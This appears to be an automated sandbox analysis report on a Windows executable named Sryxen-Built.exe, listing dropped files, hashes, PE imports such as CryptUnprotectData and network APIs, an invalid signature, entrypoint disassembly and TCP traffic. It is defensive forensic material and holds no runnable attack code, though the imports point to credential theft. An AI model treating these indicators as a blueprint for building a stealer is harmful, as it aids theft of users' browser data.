                                                                                                                                                                                                                                                                                                Preview:{.. "content_scripts": [ {.. "js": [ "content.js" ],.. "matches": [ "https://chrome.google.com/webstore/*" ].. }, {.. "js": [ "content_new.js" ],.. "matches": [ "https://chromewebstore.google.com/*" ].. } ],.. "description": "Edge relevant text changes on select websites to improve user experience and precisely surfaces the action they want to take.",.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu06p2Mjoy6yJDUUjCe8Hnqvtmjll73XqcbylxFZZWe+MCEAEK+1D0Nxrp0+IuWJL02CU3jbuR5KrJYoezA36M1oSGY5lIF/9NhXWEx5GrosxcBjxqEsdWv/eDoOOEbIvIO0ziMv7T1SUnmAA07wwq8DXWYuwlkZU/PA0Mxx0aNZ5+QyMfYqRmMpwxkwPG8gyU7kmacxgCY1v7PmmZo1vSIEOBYrxl064w5Q6s/dpalSJM9qeRnvRMLsszGY/J2bjQ1F0O2JfIlBjCOUg/89+U8ZJ1mObOFrKO4um8QnenXtH0WGmsvb5qBNrvbWNPuFgr2+w5JYlpSQ+O8zUCb8QZwIDAQAB",.. "manifest_version": 3,.. "name": "Edge relevant text changes",.. "update_url": "https://edge.microsoft.com/extensionwebstorebase/v1/crx",.. "version": "1.2.1"..}..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\soPid0s.db

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\Sryxen-Built.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):98304
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                                                                                                                MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                                                                                                                SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                                                                                                                SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                                                                                                                SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\soPid0s.db-shm

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\Sryxen-Built.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):32768
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                                                                                                MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                                                                                                SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                                                                                                SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                                                                                                SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\v42GLbR.db

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\Sryxen-Built.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):126976
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.47147045728725767
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                                                                                                                                                MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                                                                                                                                                SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                                                                                                                                                SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                                                                                                                                                SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                                                                File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1835008
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.470245940505732
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6144:N+Xfpi67eLPU9skLmb0b4fWSPKaJG8nAgejZQqZaKWFIeC/F1cXkdW1qaEGlF:oXD94fWlLZQqYgtWUsF
                                                                                                                                                                                                                                                                                                MD5:E171FEEDACF626930350BED7EA650213
                                                                                                                                                                                                                                                                                                SHA1:BBDF17B7CAA86426B8ACFE703328DC4BAF654C10
                                                                                                                                                                                                                                                                                                SHA-256:9CAC809553EBB6A970ECEEC7AE6AE9AE7F9BBA93FD0DBA40DC25D0532D37C57F
                                                                                                                                                                                                                                                                                                SHA-512:2A8042BD2D47C7768F1EAC9939F2805D98998609EB75989CDEAEB295C607BAABA98803929900DC50EFD2E15EBDE7B4E0C16B04119D0A24044005DAA6C3CB800C
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:regf:...:....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..7wK...............................................................................................................................................................................................................................................................................................................................................{@!C........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Windows\appcompat\Programs\Amcache.hve.LOG1

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                                                                File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):32768
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.099285575145873
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:768:SIRDoFVCNr0WFRssbLEl99Gddl+9uPIEcfmsc7inqF:SIJFdDIlMdl0utcO
                                                                                                                                                                                                                                                                                                MD5:42BE7D3A030BE3EE2BA8D04EE6339B96
                                                                                                                                                                                                                                                                                                SHA1:0246CEC3F55B69B09FF88B3BCBB5EE7D3F218B9A
                                                                                                                                                                                                                                                                                                SHA-256:2C020425CC5991A15A72A83278372B55F62D59CD09CF2BC44E1145DE67A781DE
                                                                                                                                                                                                                                                                                                SHA-512:D115BB5E9CFBE4CF52A05722083CCC8E5DBA33B9010DE686EE5EE337FCD824ECF1CBDB718CD5F41B287C1BCCA8C94D03DFF8E1BF75916A34720A72086F75CD41
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:regf9...9....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..7wK...............................................................................................................................................................................................................................................................................................................................................}@!CHvLE.~......9..............5OK..P...RfB.....................................0..hbin.................\.Z............nk,..\.Z....................h...................................<.......&...{11517B7C-E79D-4e20-961B-75A811715ADD}..`...sk..........c...........\...l.............H.........?...................?...................?........... ... ........... ... ...................$.N..........vk..4...`...........CreatingCommand.....O.n.e.D.r.i.v.e.S.e.t.u.p...e.x.e. ./.s.i.l.e.n.t...

                                                                                                                                                                                                                                                                                                \Device\ConDrv

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Windows\System32\curl.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text, with CR, LF line terminators
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):65
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.229362621582542
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:3JtNQ8FReOAWzdgAi0l8VJYMQwn:3JtNQUOWzdYA8Vn
                                                                                                                                                                                                                                                                                                MD5:9264627768FEAE37B3907165E909A7D0
                                                                                                                                                                                                                                                                                                SHA1:E4408A1FD5D673A5723486C53E35D4FA2CCA9FC8
                                                                                                                                                                                                                                                                                                SHA-256:8C0D25165D268488F578124358BD2504C39996F3DECBFA37598F0BC680A03BCD
                                                                                                                                                                                                                                                                                                SHA-512:3046FB94751A1CB2539F867D9A580FCC06486C032ECC8B8527BC047BB0BB8A435AD37135A99F141B0033D561F9BABE0B3E0C7C07E1FEAD2DC47072FE4BF7E141
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:curl: (26) Failed to open/read local data from file/application..

                                                                                                                                                                                                                                                                                                Static File Info

                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                File type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.418387491156768
                                                                                                                                                                                                                                                                                                TrID:
                                                                                                                                                                                                                                                                                                • Win64 Executable Console (202006/5) 92.65%
                                                                                                                                                                                                                                                                                                • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                                                                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                                                                                                                                                                                                • DOS Executable Generic (2002/1) 0.92%
                                                                                                                                                                                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                                                File name:Sryxen-Built.exe
                                                                                                                                                                                                                                                                                                File size:3'513'696 bytes
                                                                                                                                                                                                                                                                                                MD5:839dabb2304f06d4c823907cd3879a6c
                                                                                                                                                                                                                                                                                                SHA1:2adc26c5defb4817242701c3632beb94af9daa56
                                                                                                                                                                                                                                                                                                SHA256:cabcfa250019a3bec5927a8bf657c81a4c6d506d6a1b1afdd124d4ade91db389
                                                                                                                                                                                                                                                                                                SHA512:de04a877680c6e2a5841764badadcbff229d802cf66ce68c22c5bcddc19f698b540796a292e483319251a192bf05f4db14d7d326554b3d6e34c0e5a794f97051
                                                                                                                                                                                                                                                                                                SSDEEP:49152:m7rXPM0ufBv79usw1hz4jKc8O3329V92ZF/Ii2f:EgS6jOO33G92LQf
                                                                                                                                                                                                                                                                                                TLSH:8CF508AEDE2F11E9C0B7D0B8A567722BF9A0384943B553D752909F061B13BE4A97D3C0
                                                                                                                                                                                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......g.........."....+. +..........R'........@..............................5.....T.5...`................................

                                                                                                                                                                                                                                                                                                File Icon

                                                                                                                                                                                                                                                                                                Icon Hash:90cececece8e8eb0

                                                                                                                                                                                                                                                                                                Static PE Info

                                                                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                                                                Entrypoint:0x1402752f8
                                                                                                                                                                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                                                                                                                                                                Digitally signed:true
                                                                                                                                                                                                                                                                                                Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                Subsystem:windows cui
                                                                                                                                                                                                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                                                                                                                                                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                                                Time Stamp:0x67CCCDC6 [Sat Mar 8 23:07:50 2025 UTC]
                                                                                                                                                                                                                                                                                                TLS Callbacks:
                                                                                                                                                                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                                                                                                                                                                OS Version Major:6
                                                                                                                                                                                                                                                                                                OS Version Minor:0
                                                                                                                                                                                                                                                                                                File Version Major:6
                                                                                                                                                                                                                                                                                                File Version Minor:0
                                                                                                                                                                                                                                                                                                Subsystem Version Major:6
                                                                                                                                                                                                                                                                                                Subsystem Version Minor:0
                                                                                                                                                                                                                                                                                                Import Hash:5c12bc2fc42efaaa44889854cfdc93c1

                                                                                                                                                                                                                                                                                                Authenticode Signature

                                                                                                                                                                                                                                                                                                Signature Valid:false
                                                                                                                                                                                                                                                                                                Signature Issuer:CN=Oracle
                                                                                                                                                                                                                                                                                                Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                                                                                                                                                                                                                                Error Number:-2146762487
                                                                                                                                                                                                                                                                                                Not Before, Not After
                                                                                                                                                                                                                                                                                                • 08/03/2025 23:07:59 31/12/2039 23:59:59
                                                                                                                                                                                                                                                                                                Subject Chain
                                                                                                                                                                                                                                                                                                • CN=Oracle
                                                                                                                                                                                                                                                                                                Version:3
                                                                                                                                                                                                                                                                                                Thumbprint MD5:38C30EB8D7EAE8F4772B75EB0D34A8A1
                                                                                                                                                                                                                                                                                                Thumbprint SHA-1:C120B3965818987B71BFC7C33CEC4621F86A48C8
                                                                                                                                                                                                                                                                                                Thumbprint SHA-256:DE2FECE6ABCF65383089F8B2B3EC7B8F148EADB3DF0B57254FA5B9AFC6C28B29
                                                                                                                                                                                                                                                                                                Serial:2CC62850890423B745B3438D5E2A68A4

                                                                                                                                                                                                                                                                                                Entrypoint Preview

                                                                                                                                                                                                                                                                                                Instruction
                                                                                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                                                                                sub esp, 28h
                                                                                                                                                                                                                                                                                                call 00007F0BE0680B10h
                                                                                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                                                                                add esp, 28h
                                                                                                                                                                                                                                                                                                jmp 00007F0BE0680427h
                                                                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                                                                                mov dword ptr [esp+10h], ebx
                                                                                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                                                                                mov dword ptr [esp+18h], esi
                                                                                                                                                                                                                                                                                                push ebp
                                                                                                                                                                                                                                                                                                push edi
                                                                                                                                                                                                                                                                                                inc ecx
                                                                                                                                                                                                                                                                                                push esi
                                                                                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                                                                                mov ebp, esp
                                                                                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                                                                                sub esp, 10h
                                                                                                                                                                                                                                                                                                xor eax, eax
                                                                                                                                                                                                                                                                                                xor ecx, ecx
                                                                                                                                                                                                                                                                                                cpuid
                                                                                                                                                                                                                                                                                                inc esp
                                                                                                                                                                                                                                                                                                mov eax, ecx
                                                                                                                                                                                                                                                                                                inc esp
                                                                                                                                                                                                                                                                                                mov edx, edx
                                                                                                                                                                                                                                                                                                inc ecx
                                                                                                                                                                                                                                                                                                xor edx, 49656E69h
                                                                                                                                                                                                                                                                                                inc ecx
                                                                                                                                                                                                                                                                                                xor eax, 6C65746Eh
                                                                                                                                                                                                                                                                                                inc esp
                                                                                                                                                                                                                                                                                                mov ecx, ebx
                                                                                                                                                                                                                                                                                                inc esp
                                                                                                                                                                                                                                                                                                mov esi, eax
                                                                                                                                                                                                                                                                                                xor ecx, ecx
                                                                                                                                                                                                                                                                                                mov eax, 00000001h
                                                                                                                                                                                                                                                                                                cpuid
                                                                                                                                                                                                                                                                                                inc ebp
                                                                                                                                                                                                                                                                                                or edx, eax
                                                                                                                                                                                                                                                                                                mov dword ptr [ebp-10h], eax
                                                                                                                                                                                                                                                                                                inc ecx
                                                                                                                                                                                                                                                                                                xor ecx, 756E6547h
                                                                                                                                                                                                                                                                                                mov dword ptr [ebp-0Ch], ebx
                                                                                                                                                                                                                                                                                                inc ebp
                                                                                                                                                                                                                                                                                                or edx, ecx
                                                                                                                                                                                                                                                                                                mov dword ptr [ebp-08h], ecx
                                                                                                                                                                                                                                                                                                mov edi, ecx
                                                                                                                                                                                                                                                                                                mov dword ptr [ebp-04h], edx
                                                                                                                                                                                                                                                                                                jne 00007F0BE068060Dh
                                                                                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                                                                                or dword ptr [000BFDC9h], FFFFFFFFh
                                                                                                                                                                                                                                                                                                and eax, 0FFF3FF0h
                                                                                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                                                                                mov dword ptr [000BFDB1h], 00008000h
                                                                                                                                                                                                                                                                                                cmp eax, 000106C0h
                                                                                                                                                                                                                                                                                                je 00007F0BE06805DAh
                                                                                                                                                                                                                                                                                                cmp eax, 00020660h
                                                                                                                                                                                                                                                                                                je 00007F0BE06805D3h
                                                                                                                                                                                                                                                                                                cmp eax, 00020670h
                                                                                                                                                                                                                                                                                                je 00007F0BE06805CCh
                                                                                                                                                                                                                                                                                                add eax, FFFCF9B0h
                                                                                                                                                                                                                                                                                                cmp eax, 20h
                                                                                                                                                                                                                                                                                                jnbe 00007F0BE06805D6h
                                                                                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                                                                                mov ecx, 00010001h
                                                                                                                                                                                                                                                                                                add dword ptr [eax], eax
                                                                                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                dec eax
                                                                                                                                                                                                                                                                                                bt ecx, eax
                                                                                                                                                                                                                                                                                                jnc 00007F0BE06805C6h
                                                                                                                                                                                                                                                                                                inc esp
                                                                                                                                                                                                                                                                                                mov eax, dword ptr [000C350Fh]
                                                                                                                                                                                                                                                                                                inc ecx
                                                                                                                                                                                                                                                                                                or eax, 01h
                                                                                                                                                                                                                                                                                                inc esp
                                                                                                                                                                                                                                                                                                mov dword ptr [000C3504h], eax

                                                                                                                                                                                                                                                                                                Data Directories

                                                                                                                                                                                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x32ebe00x74.rdata
                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x32ec540xb4.rdata
                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x35c0000x1e0.rsrc
                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x33b0000x203a0.pdata
                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x3582000x1b60.pdata
                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x35d0000x1a1c.reloc
                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x2ffba00x1c.rdata
                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x2ffd800x28.rdata
                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x2ffa600x140.rdata
                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x2b30000x6c0.rdata
                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                                                                                Sections

                                                                                                                                                                                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                                                                .text0x10000x2b1ff80x2b200020a48759e20dd14a366d2afb484daf1funknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                                .rdata0x2b30000x7d2fc0x7d40005f0f63b7b4245b6728c54b8917d6deaFalse0.4517780844560878data6.422686941485478IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                                .data0x3310000x915c0x680024cd5e03203ca70998947c488b9e7476False0.1866736778846154data3.4520966521434713IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                                .pdata0x33b0000x203a00x20400e4cebf0b3c982c4d07ea0006b1e0be0dFalse0.4360843628875969data6.097612517228661IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                                .rsrc0x35c0000x1e00x200aae1277d5ce773b6c7f4c9c56449df98False0.53125data4.7176788329467545IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                                .reloc0x35d0000x1a1c0x1c007a747e54bf248beb1436ac059de3984eFalse0.38462611607142855data5.340811170887403IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                                                                                                Resources

                                                                                                                                                                                                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                                                                RT_MANIFEST0x35c0600x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727

                                                                                                                                                                                                                                                                                                Imports

                                                                                                                                                                                                                                                                                                DLLImport
                                                                                                                                                                                                                                                                                                KERNEL32.dllProcess32FirstW, Process32NextW, LocalFree, GetEnvironmentVariableA, CreateDirectoryA, GetFileAttributesA, Sleep, FormatMessageW, AddVectoredExceptionHandler, RemoveVectoredExceptionHandler, IsDebuggerPresent, GetSystemInfo, VirtualQueryEx, ReadProcessMemory, FileTimeToSystemTime, FormatMessageA, IsWow64Process, GetProcAddress, LoadLibraryW, K32EnumProcessModulesEx, K32GetModuleBaseNameW, CreateToolhelp32Snapshot, DeleteFileA, OutputDebugStringW, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, FreeConsole, RaiseException, SetUnhandledExceptionFilter, K32GetModuleFileNameExW, WideCharToMultiByte, MultiByteToWideChar, OpenProcess, CreateProcessW, TerminateProcess, CloseHandle, GetTempPathW, WriteFile, CreateFileW, WriteConsoleW, SetStdHandle, SetEnvironmentVariableW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetOEMCP, GetACP, IsValidCodePage, GetTimeZoneInformation, ReadConsoleW, GetConsoleMode, GetConsoleOutputCP, EnumSystemLocalesW, K32GetModuleInformation, GetLastError, GetUserDefaultLCID, IsValidLocale, GetLocaleInfoW, LCMapStringW, CompareStringW, FlsFree, FlsSetValue, FlsGetValue, FlsAlloc, SetFilePointerEx, GetFileSizeEx, GetFileType, GetCommandLineW, GetCommandLineA, GetStdHandle, GetModuleFileNameW, ExitProcess, GetModuleHandleExW, FlushFileBuffers, GetTickCount, QueryPerformanceCounter, MapViewOfFile, CreateFileMappingW, GetSystemTime, GetSystemTimeAsFileTime, FreeLibrary, SystemTimeToFileTime, GetProcessHeap, GetCurrentProcessId, GetFileSize, LockFileEx, UnlockFile, HeapDestroy, HeapCompact, HeapAlloc, HeapReAlloc, DeleteFileW, WaitForSingleObjectEx, LoadLibraryA, CreateFileA, FlushViewOfFile, GetFileAttributesExW, GetDiskFreeSpaceA, GetTempPathA, HeapSize, HeapValidate, UnmapViewOfFile, GetFileAttributesW, WaitForSingleObject, CreateMutexW, UnlockFileEx, SetEndOfFile, GetFullPathNameA, SetFilePointer, LockFile, OutputDebugStringA, GetDiskFreeSpaceW, GetFullPathNameW, HeapFree, HeapCreate, ReadFile, AreFileApisANSI, TryEnterCriticalSection, DeleteCriticalSection, GetCurrentThreadId, ReleaseSRWLockExclusive, AcquireSRWLockExclusive, WakeAllConditionVariable, SleepConditionVariableSRW, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, GetCurrentProcess, IsProcessorFeaturePresent, GetStartupInfoW, GetModuleHandleW, InitializeSListHead, GetLocaleInfoEx, GetExitCodeThread, GetNativeSystemInfo, TryAcquireSRWLockExclusive, WakeConditionVariable, GetStringTypeW, GetCurrentDirectoryW, CreateDirectoryW, FindClose, FindFirstFileW, FindFirstFileExW, FindNextFileW, GetFileInformationByHandle, GetFinalPathNameByHandleW, SetFileInformationByHandle, CopyFileW, MoveFileExW, GetFileInformationByHandleEx, QueryPerformanceFrequency, InitializeCriticalSectionEx, EncodePointer, DecodePointer, LCMapStringEx, CompareStringEx, GetCPInfo, RtlPcToFileHeader, RtlUnwindEx, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, CreateThread, ExitThread, FreeLibraryAndExitThread, RtlUnwind
                                                                                                                                                                                                                                                                                                ADVAPI32.dllGetUserNameA, CryptAcquireContextW, LookupAccountSidW, GetTokenInformation, OpenProcessToken, SystemFunction036, CryptGenRandom, CryptReleaseContext
                                                                                                                                                                                                                                                                                                WINHTTP.dllWinHttpCloseHandle, WinHttpReadData, WinHttpQueryDataAvailable, WinHttpOpenRequest, WinHttpSendRequest, WinHttpReceiveResponse, WinHttpOpen, WinHttpConnect
                                                                                                                                                                                                                                                                                                ole32.dllCoTaskMemFree
                                                                                                                                                                                                                                                                                                SHELL32.dllSHGetKnownFolderPath, SHGetFolderPathA
                                                                                                                                                                                                                                                                                                CRYPT32.dllCryptUnprotectData
                                                                                                                                                                                                                                                                                                WS2_32.dllclosesocket, WSACleanup, WSAStartup, inet_pton, ioctlsocket, getsockopt, connect, htons, ntohs, recv, select, send, WSAGetLastError, socket
                                                                                                                                                                                                                                                                                                VERSION.dllVerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW

                                                                                                                                                                                                                                                                                                Exports

                                                                                                                                                                                                                                                                                                NameOrdinalAddress
                                                                                                                                                                                                                                                                                                ?EndSED@@YAPEAXPEAX@Z10x140007d40

                                                                                                                                                                                                                                                                                                Possible Origin

                                                                                                                                                                                                                                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                                                                                EnglishUnited States

                                                                                                                                                                                                                                                                                                Network Behavior

                                                                                                                                                                                                                                                                                                Network Port Distribution

                                                                                                                                                                                                                                                                                                TCP Packets

                                                                                                                                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                                                Mar 9, 2025 00:43:15.009654999 CET49671443192.168.2.4204.79.197.203
                                                                                                                                                                                                                                                                                                Mar 9, 2025 00:43:15.321922064 CET49671443192.168.2.4204.79.197.203
                                                                                                                                                                                                                                                                                                Mar 9, 2025 00:43:15.931363106 CET49671443192.168.2.4204.79.197.203
                                                                                                                                                                                                                                                                                                Mar 9, 2025 00:43:17.134466887 CET49671443192.168.2.4204.79.197.203
                                                                                                                                                                                                                                                                                                Mar 9, 2025 00:43:19.540688992 CET49671443192.168.2.4204.79.197.203
                                                                                                                                                                                                                                                                                                Mar 9, 2025 00:43:23.778014898 CET49678443192.168.2.420.189.173.27
                                                                                                                                                                                                                                                                                                Mar 9, 2025 00:43:24.088089943 CET49678443192.168.2.420.189.173.27
                                                                                                                                                                                                                                                                                                Mar 9, 2025 00:43:24.341577053 CET49671443192.168.2.4204.79.197.203
                                                                                                                                                                                                                                                                                                Mar 9, 2025 00:43:24.696904898 CET49678443192.168.2.420.189.173.27
                                                                                                                                                                                                                                                                                                Mar 9, 2025 00:43:25.902847052 CET49678443192.168.2.420.189.173.27
